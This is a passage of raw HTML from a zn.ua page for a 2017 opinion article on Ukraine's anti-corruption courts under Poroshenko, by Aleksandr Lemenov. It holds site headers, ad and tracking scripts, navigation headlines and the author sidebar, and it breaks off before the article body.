<!DOCTYPE html>
<html itemid='https://zn.ua/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html' id=''>
  <head>
    <meta content='text/html; charset=utf-8' http-equiv='content-type' />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel='stylesheet' type='text/css' href='/static/style/style.css' />
    <link rel='alternate' type='application/rss+xml' title='' href='/rss' />
    <!--[if IE 6]><script type='text/javascript' src='/static/js/iehover.js'></script><![endif]-->
  
<link rel='shortcut icon' href='/favicon.ico' />
<link rel="canonical" href="https://zn.ua/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html"/>
<link rel="alternate" href="https://zn.ua/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html" hreflang="ru" />
<link rel="alternate" href="https://zn.ua/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html" hreflang="x-default" />
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:700&subset=cyrillic' rel='stylesheet' type='text/css'>
<script>
                                 !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
                                 n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
                                 n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
                                 t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
                                 document,'script','https://connect.facebook.net/en_US/fbevents.js');
                                 fbq('init', '277876779342229', {
                                 em: 'insert_email_variable,'
                                 });
                                 fbq('track', 'PageView');
                                 </script>
                                 <noscript><img height='1' width='1' style='display:none'
                                 src='https://www.facebook.com/tr?id=277876779342229&ev=PageView&noscript=1'
                                 /></noscript>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js'></script>
<script src='https://apis.google.com/js/platform.js' async defer></script>
<link rel='publisher' href='https://plus.google.com/b/116699980639406409904/' />
<meta property='fb:admins' content='100000708653400,100000936143901,1728927826,100000201934702' />
<meta property='fb:app_id' content='350471815115154' />
<script type='text/javascript'>
        var googletag = googletag || {};
        googletag.cmd = googletag.cmd || [];
        (function() {
          var gads = document.createElement('script');
          gads.async = true;
          gads.type = 'text/javascript';
          var useSSL = 'https:' == document.location.protocol;
          gads.src = (useSSL ? 'https:' : '') +
            '//www.googletagservices.com/tag/js/gpt.js';
          var node = document.getElementsByTagName('script')[0];
          node.parentNode.insertBefore(gads, node);
        })();
      </script>

      <script type='text/javascript'>
        googletag.cmd.push(function() {
          googletag.defineSlot('/17774365/zn.ua', [300, 250], 'div-gpt-ad-1461742398816-0').addService(googletag.pubads());
          googletag.pubads().enableSingleRequest();
          googletag.enableServices();
        });
      </script>
<meta itemprop="description" name="description" content="Президент Украины четко отметил, что создание эффективного и независимого суда поможет привлекать к уголовной ответственности коррупционеров, кем бы они ни были." />
<meta property="article:published" itemprop="datePublished" content="2017-10-06" />
<meta property="og:title" content="Антикоррупционные суды  по-новому: рецепт Порошенко" />
<meta property="og:description" content="Президент Украины четко отметил, что создание эффективного и независимого суда поможет привлекать к уголовной ответственности коррупционеров, кем бы они ни были." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://zn.ua/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html" />
<meta property="og:image" content="https://image.zn.ua/media/images/645x426/Oct2017/186441.jpg" />
<meta property="og:site_name" content="ZN.ua" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@znua" />
<meta name="twitter:title" content="Антикоррупционные суды  по-новому: рецепт Порошенко" />
<meta name="twitter:description" content="Президент Украины четко отметил, что создание эффективного и независимого суда поможет привлекать к уголовной ответственности коррупционеров, кем бы они ни были." />
<meta name="twitter:creator" content="@znua" />
<meta name="twitter:image:src" content="https://image.zn.ua/media/images/645x426/Oct2017/186441.jpg" />
<meta name="twitter:domain" content="zn.ua" />
<link rel="alternate" href="https://dt.ua/internal/antikorupciyni-sudi-po-novomu-recept-poroshenka-256280_.html" hreflang="uk" />
<title>Антикоррупционные суды  по-новому: рецепт Порошенко - Внутренняя политика Украины &ndash; аналитика, статьи, эксклюзивы  - zn.ua</title>
<meta name='keywords' content='Внутренняя политика Украины &ndash; аналитика, статьи, эксклюзивы ,Александр Леменов' />
<link rel='stylesheet' type='text/css' href='/static/style/jquery.simplemodal.css' />
<link rel='stylesheet' type='text/css' href='/static/style/svc.passport.ui.css' />
<link rel='stylesheet' type='text/css' href='/static/style/jquery.mCustomScrollbar.css' />
<link rel='stylesheet' type='text/css' href='/static/slick/slick.css' />
<link rel='stylesheet' type='text/css' href='/static/slick/slick-theme.css' />
<link rel='stylesheet' type='text/css' href='/static/style/section.article.css' />
<link rel='stylesheet' type='text/css' href='/static/style/comments.css' />
<script type='text/javascript' src='/static/js/json.min.js'></script>
<script type='text/javascript' src='/static/js/jquery.min.js'></script>
<script type='text/javascript' src='/static/js/jquery.form.js'></script>
<script type='text/javascript' src='/static/js/jquery.simplemodal.js'></script>
<script type='text/javascript' src='/static/js/jquery.mCustomScrollbar.concat.min.js'></script>
<script type='text/javascript' src='/static/js/core.js'></script>
<script type='text/javascript' src='/static/js/core.ajax.js'></script>
<script type='text/javascript' src='/static/js/core.passport.js'></script>
<script type='text/javascript' src='/static/js/box_znua2.js'></script>
<script type='text/javascript' src='/static/js/owl.carousel.min.js'></script>
<script type='text/javascript' src='/static/slick/slick.js'></script>
<script type='text/javascript' src='//s7.addthis.com/js/300/addthis_widget.js#pubid=ofedorov'></script>
<script type='text/javascript' src='https://pro.hit.gemius.pl/gstream.js'></script>
<script type='text/javascript' src='/static/js/adriver.core.2.js'></script>
<script type='text/javascript'>
try{$(document).ready(function(){jQuery.core.ajax.init();});}catch(e){};
var section_id = '';
var pp_gemius_identifier = new String('');
var N = 2; var ar_bn1= Math.floor(Math.random()*N+1);
var S_ID = '60321';
var R_ID = '60003';
var A_ID = '262225';
try{$(document).ready(function(){box_znua2.comments.init();});}catch(e){};
</script>
</head>
  <body class=''>

    <div id="fb-root"></div>
    <script>
      window.fbAsyncInit = function() {
      FB.init({appId: '350471815115154', xfbml: true, version: 'v2.1'});
      FB.Event.subscribe('edge.create', function(response) {
      document.cookie ='fbliked=true; expires=Thu, 2 Aug 2030 20:47:11 UTC; path=/'
      });
      };
      (function(d, s, id){
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) {return;}
      js = d.createElement(s); js.id = id;
      js.src = "https://connect.facebook.net/ru_RU/sdk.js";
      fjs.parentNode.insertBefore(js, fjs);
      }(document, 'script', 'facebook-jssdk'));
    </script>
    <div id='wrapper'>
      <div id='header'>
  <div class='container'>
    <a class='top_logo' href='/'></a>
     <div class='menu'>
  <div class='menu_mob'>
    <span class='first'></span>
    <span class='second'></span>
    <span class='fird'></span>
  </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/POLITICS'>Политика</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/vo-vremya-ugona-avtomobilya-u-granovskogo-pohitili-noutbuk-i-sumku-s-dokumentami-smi-262232_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Mar2016/143757.jpg' alt='Машину Грановского угнали в центре Киева у всех на виду'>
                <span class='sub_title'>Во время угона автомобиля у Грановского похитили ноутбук и сумку с документами &ndash; СМИ<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/venecianskaya-komissiya-ocenila-ukrainskie-zakonoproekty-ob-antikorrupcionnom-sude-262171_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186361.jpg' alt='Венецианская комиссия указала на ошибки украинских законопроектов об антикоррупционном суде.'>
                <span class='sub_title'>Венецианская комиссия оценила украинские законопроекты об антикоррупционном суде<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/franciya-i-germaniya-privetstvuyut-prodlenie-zakona-ob-osobom-statuse-ordlo-262184_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Mar2016/142106.jpg' alt='Франция и Германия одобрили продление особого статуса Донбасса'>
                <span class='sub_title'>Франция и Германия приветствуют продление закона об особом статусе ОРДЛО<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/parubiy-podpisal-zakon-ob-osobom-statuse-donbassa-262167_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186264.jpg' alt='Президентский законопроект об особом статусе Донбассу ушел на подпись президенту'>
                <span class='sub_title'>Парубий подписал закон об особом статусе Донбасса<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/sovet-evropy-polozhitelno-ocenivaet-reformu-obrazovaniya-v-ukraine-kuleba-262161_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Dec2015/135316.jpg' alt='Гриневич объяснила суть реформы образования Совету Европы'>
                <span class='sub_title'>Совет Европы положительно оценивает реформу образования в Украине &ndash; Кулеба<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/POLITICS'>Все новости раздела Политика</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/ECONOMICS'>Экономика</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/parubiy-podpisal-zakon-o-pensionnoy-reforme-262227_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Mar2016/142866.jpg' alt='В Кабмине обещают повышение пенсий в октябре'>
                <span class='sub_title'>Парубий подписал закон о пенсионной реформе<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/nalogoviki-nazvali-desyat-krupneyshih-dolzhnikov-ukrainy-262157_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Feb2015/109939.jpg' alt='Первое место среди должников заняла компания &quot;Укрнафта&quot;'>
                <span class='sub_title'>Налоговики назвали десять крупнейших должников Украины<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/rossiya-imeet-vse-shansy-stat-glavnoy-politicheskoy-siloy-v-persidskom-zalive-ekspert-262147_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186248.jpg' alt=''>
                <span class='sub_title'>Россия имеет все шансы стать главной политической силой в Персидском заливе &ndash; эксперт<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/v-2017-godu-kolichestvo-krupnyh-nalogoplatelschikov-uvelichilos-na-69-262140_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2014/98468.jpg' alt='Названы топ-10 крупнейших плательщиков налогов в 2017 году'>
                <span class='sub_title'>В 2017 году количество крупных налогоплательщиков увеличилось на 69%<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/v-mvf-obespokoeny-zakonoproektom-7115-i-popytkoy-vernut-staruyu-sistemu-vozmescheniya-nds-262063_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Dec2015/135903.jpg' alt='В МВФ вступились за систему возмещения НДС'>
                <span class='sub_title'>В МВФ обеспокоены законопроектом 7115 и попыткой вернуть старую систему возмещения НДС<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/ECONOMICS'>Все новости раздела Экономика</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/UKRAINE'>Украина</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/boeviki-nakryli-shirokino-minometnym-ognem-262209_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2017/185504.jpg' alt='Террористы выпустили шесть мин по позициям ВСУ'>
                <span class='sub_title'>Боевики накрыли Широкино минометным огнем<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/voennoe-prisutstvie-rossii-v-donbasse-ne-vyzyvaet-somneniy-volker-262169_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2017/184989.jpg' alt='Волкер: Россия управляет и контролирует вооруженные силы на востоке Украины'>
                <span class='sub_title'>Военное присутствие России в Донбассе не вызывает сомнений &ndash; Волкер<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/ko-vtoromu-chteniyu-poziciya-po-krymu-v-prezidentskom-zakonoproekte-budet-soglasovana-parubiy-262131_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2017/184041.jpg' alt='Позицию по Крыму в президентском законопроекте согласуют ко второму чтению.'>
                <span class='sub_title'>Ко второму чтению позиция по Крыму в президентском законопроекте будет согласована - Парубий<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/gschs-obyavila-shtormovoe-preduprezhdenie-v-ukraine-262127_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186314.jpg' alt=''>
                <span class='sub_title'>ГСЧС объявила штормовое предупреждение в Украине<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/v-ukraine-spasatelnye-podrazdeleniya-pereshli-na-usilennyy-rezhim-sluzhby-262111_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186291.jpg' alt='После Германии штормовой ветер грозит и Украине'>
                <span class='sub_title'>В Украине спасательные подразделения перешли на усиленный режим службы<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/UKRAINE'>Все новости раздела Украина</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/WORLD'>Мир</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/armiya-asada-voshla-v-poslednyuyu-stolicu-igil-v-sirii-smi-262235_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186443.jpg' alt='Войска Асада заняли несколько домов на окраине Меядина'>
                <span class='sub_title'>Армия Асада вошла в последнюю &quot;столицу&quot; ИГИЛ в Сирии - СМИ<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/vice-prezident-pase-geyl-budet-ispolnyat-obyazannosti-glavy-262195_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186375.jpg' alt='Гейл является старшим среди всех заместителей ушедшего в отставку Аграмунта'>
                <span class='sub_title'>Вице-президент ПАСЕ Гейл будет исполнять обязанности главы<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/pravitelstvo-ispanii-prineslo-izvineniya-za-deystviya-policii-v-den-referenduma-v-katalonii-262178_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/185937.jpg' alt='В Испании прозвучали первые извинения за действия полиции во время референдума.'>
                <span class='sub_title'>Правительство Испании принесло извинения за действия полиции в день референдума в Каталонии<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/agramunt-podal-v-otstavku-s-dolzhnosti-predsedatelya-pase-262164_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2016/160178.jpg' alt='Аграмунт подал в отставку.'>
                <span class='sub_title'>Аграмунт подал в отставку с должности председателя ПАСЕ<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/nobelevskuyu-premiyu-mira-prisudili-mezhdunarodnoy-kampanii-za-likvidaciyu-yadernogo-oruzhiya-262139_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2016/159679.jpg' alt='В Стокгольме назвали лауреата Нобелевской премии мира'>
                <span class='sub_title'>Нобелевскую премию мира присудили Международной кампании по запрету ядерного оружия<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/WORLD'>Все новости раздела Мир</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/TECHNOLOGIES'>Технологии</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/v-obrazcah-meda-po-vsemu-miru-naydena-bolshaya-koncentraciya-insekticidov-262202_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2015/126954.jpg' alt='Образцы меда со всего мира содержат инсектициды'>
                <span class='sub_title'>В образцах меда по всему миру найдена большая концентрация инсектицидов<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/uchenye-rasskazali-o-proishozhdenii-zapasov-vody-na-lune-262191_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Aug2015/122904.jpg' alt='Луна обладала запасами воды еще с рождения'>
                <span class='sub_title'>Ученые рассказали о происхождении запасов воды на Луне<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/naydeny-novye-geny-kotorye-dostalis-lyudyam-ot-neandertalcev-262162_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Feb2016/140495.jpg' alt='Гены неандертальцев способствуют развитию ожирения у людей'>
                <span class='sub_title'>Найдены новые гены, которые достались людям от неандертальцев<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/rossiyskie-hakery-ispolzovali-antivirus-kasperskogo-dlya-krazhi-dannyh-anb-smi-262158_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Aug2015/123926.jpg' alt='Хакеры похитили данные АНБ с помощью &quot;Антивируса Касперского&quot;'>
                <span class='sub_title'>Российские хакеры использовали &quot;Антивирус Касперского&quot; для кражи данных АНБ &ndash; СМИ<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/ssha-oficialno-zayavili-o-namerenii-otpravit-lyudey-na-lunu-262146_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Apr2016/144670.jpg' alt='США намерены &quot;вернуться на Луну&quot;'>
                <span class='sub_title'>США официально заявили о намерении отправить людей на Луну<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/TECHNOLOGIES'>Все новости раздела Технологии</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/CULTURE'>Культура</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/opublikovan-treyler-filma-reprodukciya-s-kianu-rivzom-262175_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186362.jpg' alt='Главный герой фильма клонирует свою семью'>
                <span class='sub_title'>Опубликован трейлер фильма &quot;Репродукция&quot; с Киану Ривзом<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/fond-izolyaciya-predstavil-interaktivnuyu-vystavku-igra-v-proshloe-262165_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186360.jpg' alt=''>
                <span class='sub_title'>Фонд &quot;Изоляция&quot; представил интерактивную выставку &quot;Игра в прошлое&quot;<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/zvezda-igry-prestolov-rasskazal-kogda-zavershatsya-semki-vosmogo-sezona-262151_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/May2017/175966.jpg' alt='Лиам Каннингем рассказал о съемках финального сезона &quot;Игры престолов&quot;'>
                <span class='sub_title'>Звезда &quot;Игры престолов&quot; рассказал, когда завершатся съемки восьмого сезона<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/netflix-i-marvel-otmenili-prezentaciyu-karatelya-iz-za-strelby-v-las-vegase-262066_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2017/185256.jpg' alt='Премьера &quot;Карателя&quot; на Comic Con не состоится'>
                <span class='sub_title'>Netflix и Marvel отменили презентацию &quot;Карателя&quot; из-за стрельбы в Лас-Вегасе<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/nobelevskuyu-premiyu-po-literature-poluchit-kadzuo-isiguro-262041_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186227.jpg' alt='Кадзуо Исигуро стал лауреатом Нобелевской премии по литературе'>
                <span class='sub_title'>Нобелевскую премию по литературе получит Кадзуо Исигуро<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/CULTURE'>Все новости раздела Культура</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//zn.ua/SPORT'>Спорт</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/kosovo-ukraina-onlayn-translyaciya-matcha-262092_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186297.jpg' alt='Украинцы обязаны обыгрывать Косово'>
                <span class='sub_title'>Косово - Украина: онлайн-трансляция матча<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/kosovo-ukraina-anons-gde-smotret-match-6-oktyabrya-262124_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186311.jpg' alt='Матч состоится на нейтральном поле'>
                <span class='sub_title'>Косово - Украина: анонс, где смотреть матч 6 октября<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/chm-2018-rezultaty-matchey-evropeyskoy-kvalifikacii-5-oktyabrya-turnirnye-tablicy-262108_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186303.jpg' alt='Кейн вывел Англию в финальную часть ЧМ-2018'>
                <span class='sub_title'>ЧМ-2018: результаты матчей европейской квалификации 5 октября, турнирные таблицы<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/svitolina-odolela-rossiyanku-i-vyshla-v-chetvertfinal-turnira-v-pekine-262039_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186226.jpg' alt='Свитолина находится в нескольких шагах от титула'>
                <span class='sub_title'>Свитолина одолела россиянку и вышла в четвертьфинал турнира в Пекине<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/svitolina-probilas-v-tretiy-krug-turnira-v-pekine-261921_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186165.jpg' alt='Свитолина обыграла Барти'>
                <span class='sub_title'>Свитолина пробилась в третий круг турнира в Пекине<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/SPORT'>Все новости раздела Спорт</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item more '>
      <a class='link' href='//zn.ua/'>Еще</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          
          <div class='subitem '>
            <a class='sublink' href='/multimedia'>
              Фото и видео
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/project'>
              Спецпроекты
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/interview'>
              Интервью
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/gazeta/archive/'>
              Архив номеров
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/company-news'>
              Новости компаний
            </a>
          </div>
          
        </div>

      
    </div>
  
</div>




    <a class='top_gazeta' href='/gazeta/issue/1123'>
      <span class='top_line'>Выпуск №36</span>
      <span class='bottom_line'>30 сентября-6 октября</span>
    </a>
    <a class='top_like' href='/fond'>
      Поддержать ZN.ua
    </a>
    
    <a href='javascript:void(0)' class='top_user passport open-login 1'>
      <img class='img' src='/blank.gif' alt='' title='' />
      <div class='top_arrow'></div>
      <span class='h-message'>
        <span class='text'>Log in</span>
      </span>
    </a>
    

    

    <div class='lang'>
      <span class='lang_item'>RU</span>
      <span class='lang_item'>/</span>
      <a class='lang_item' href='//dt.ua/internal/antikorupciyni-sudi-po-novomu-recept-poroshenka-256280_.html'>UA</a>
    </div>
    <!--//<div class='top_search'>//-->
        <div class='top_search_cont'>
          <span class='top_search_btn'> </span>
          <form class='top_search' name='top_search' id='top_search' action="/search/" >
            <div class='form_cont'>
              <input type='text' name='query' value='' placeholder='' id='top_search_text' class='top_search_text' required />
              <div class='pr_filters ac-container'>
                <div>
                  <input id="ac-1" class="acc-1" name="accordion-1" type="checkbox">
                  <label for="ac-1" class='acc-2'>Искaть</label>
                  <div class="ac-x">
                    <div>
                      <label class='check_label' for="date_start_ch">по дате</label>
                      <input class='checkbox' id="date_start_ch" name="date_start_ch" type="checkbox" />
                      <div>
                        <input class='text' id="date_start" name="date_start" type="text" value='' placeholder='от' />
                        <span class='divider'> - </span>
                        <input class='text' id="date_end" name="date_end" type="text" value='' placeholder='до' />
                      </div>
                    </div>
                    <div>
                      <input class='checkbox' id="news" name="news" type="checkbox" checked="checked" type="checkbox" />
                      <label for="news">в новостях</label>
                    </div>
                    <div>
                      <input class='checkbox' id="author" name="author" type="checkbox" checked="checked" type="checkbox" />
                      <label for="author">по автору</label>
                    </div>
                    <div>
                      <input class='checkbox' id="article" name="article" type="checkbox" checked="checked" type="checkbox" />
                      <label for="article">в статьях</label>
                    </div>
                    <div>
                      <input class='checkbox' id="multimedia" name="photo_video" type="checkbox" checked="checked" type="checkbox" />
                      <label for="photo_video">в фото и видео</label>
                    </div>
                    <div>
                      <input class='checkbox' id="interview" name="interview" type="checkbox" checked="checked" type="checkbox" />
                      <label for="interview">в интервью</label>
                    </div>
                  </div>
                </div>
              </div>
              <!--//<select class='top_option' size="1" name="section">
                <option value="all">Искать везде</option>
                <option value="news">Искать в новостях</option>
                <option value="google">Исксть в гугл</option>
                <option value="photo">Искать в фото</option>
                <option value="value1">Item1</option>
              </select>//-->
              <input type="submit" class='top_search_btn_' value="Искать">
            </div>
          </form>
        </div>
    <!--//</div>//-->
  </div>
</div>

<!--  AdRiver code START. Type:AjaxJS Site: ZN BN:20 -->
<div id="adriver_banner_1492169494" style="display:block; text-align:center;"></div>

<script type="text/javascript">
new adriver("adriver_banner_1492169494", {sid:161943, bt:52, bn:1});
</script>

<!--  AdRiver code END  -->

<!--  AdRiver code START. Type:AjaxJS Site: ZN BN:20 -->
<div id="adriver_banner_1554739686"></div>
  <script type="text/javascript">
  new adriver("adriver_banner_1554739686", {sid:161943, bt:52, bn:20});
</script>
<!--  AdRiver code END  -->
<div style="clear: both"></div>

<script type='text/javascript'>
  $(function() {

    $('#header .menu_mob').click(function(){
      $('#header .menu').toggleClass('open');
    })
    $('#header .menu a').click(function(){
      $('#header .menu').removeClass('open');
    })

    $('#header .top_search_btn').live('click',function(){
      $(this).toggleClass('active');
      $('#top_search').toggleClass('active');
    });
    $('#header .top_search_close').live('click',function(){
      $('#top_search').removeClass('active');
    });
    $('#header .top_search .querry').live('click',function(){
      $('#top_search').addClass('active');
    });
    $('#header #querry').blur(function(){
      setTimeout(function(){
        $('#top_search').removeClass('active');}
      ,200);
    });

  });
</script>

      <div id='container'>
        <div id='holder'>
          <!--#block_left [START]-->
            <div id='left'>
              <div class='central_article'>

  
    <div class='top_article'>
      <h1 class='title'>Антикоррупционные суды  &quot;по-новому&quot;: рецепт Порошенко

        
        
      </h1>
      <span class='date'>
        6 октября, 19:48
      </span>
      <a class='print' href='/article/print/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html' title='Версия для печати' onclick='window.open("/article/print/internal/antikorrupcionnye-sudy-po-novomu-recept-poroshenko-262225_.html", "doc_print", "toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=660,height=500"); return false;'>
      Распечатать
      </a>
    </div>
  

  <div class='article_left'>
      <div class='authors_block'>
    <ul class='authors_imgs'>
      
        <li class='auth_img'>
          <a class='' href='/author/aleksandr-lemenov'>
            <img class='img' src='//image.zn.ua/media/images/300x250/Jun2017/178739.jpg' alt='Александр Леменов'>
          </a>
        </li>
      
    </ul>
    <div class='auth_info'>
      <span class='info_title'>
        Автор
      </span>
      <ul class='auth_list'>
        
          <li class='auth_item'>
            <a class='auth_link' href='/author/aleksandr-lemenov'>
              <span class='name'>
                Александр Леменов
              </span>
              <span class='post'>
                главный эксперт Антикоррупционной группы РПР
              </span>
            </a>
          </li>
        
      </ul>
      <div class='auth_articles_block'>
        <span class='auth_articles_list_title'>
          Статьи автора
        </span>
        <ul class='auth_articles_list'>
        
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/deydey-surka-253705_.html'>
              <span class='title'>
                Дейдей сурка
              </span>
              <span class='summary'>
                Регламентный комитет Рады начал рассматривать представление о снятии депутатской неприкосновенности с...
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/gbr-priostanovlennyy-dvigatel-preobrazovaniy-253031_.html'>
              <span class='title'>
                ГБР: приостановленный  двигатель преобразований
              </span>
              <span class='summary'>
                Трудно не заметить, как с повестки дня тихо исчез вопрос Государственного бюро расследований. И этому...
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/internal/paketnaya-neprikosnovennost-252419_.html'>
              <span class='title'>
                &quot;Пакетная&quot; неприкосновенность
              </span>
              <span class='summary'>
                На той неделе генеральный прокурор внес в Верховную Раду представление на снятие депутатской неприкосновенности...
              </span>
            </a>
            </li>
          
        </ul>
        
